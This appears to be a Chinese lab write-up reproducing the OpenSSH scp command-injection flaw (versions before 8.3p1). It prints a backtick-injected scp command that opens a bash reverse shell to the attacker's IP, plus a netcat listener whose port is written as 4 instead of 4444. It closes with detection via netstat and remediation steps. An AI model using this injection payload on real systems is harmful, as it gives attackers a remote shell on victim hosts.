Openssh命令执行复现

一、漏洞介绍

SCP是linux系统下基于ssh登录进行安全远程文件、目录拷贝的命令，可以在linux之间复制文件和目录。Openssh中小于8.3p1版本SCP命令里存在命令注入漏洞。当将文件复制到远程主机时，文件路径附加到本地SCP命令末尾，可以触发命令注入漏洞。攻击者采用反引号(`)文件作为命令注入。

二、漏洞复现环境

• 攻击机：192.168.2.132（kail）
• 靶机：192.168.2.100（centos） ssh -V 查看系统版本
• 利用场景：已经知道靶机用户（普通用户即可）密码

三、漏洞复现

1）kail端操作

• 反弹shell

scp haha.txt haha@192.168.2.100:'`/bin/bash -i >& /dev/tcp/192.168.2.132/4444 0>&1` /tmp/haha.txt' 
/bin/bash -i: 产生一个交互环境 
>&: 将标准输出和标准错误结合
/dev/tcp/ip/port: 建立一个tcp连接 
0>&1: 将标准输入重定向到标准输出

• kail监听4444端口

nc -lnvp 4

监听成功，成功反弹shell

2）centos操作

查看端口服务，发现多了4444这个端口，并且流量向外发

netstat -ntlpa | grep 4444

被攻击机发现恶意外联

四、漏洞修复方式

• 周期性换密码
• 使用rsync代替scp
• 更新ssh版本
• 等待打补丁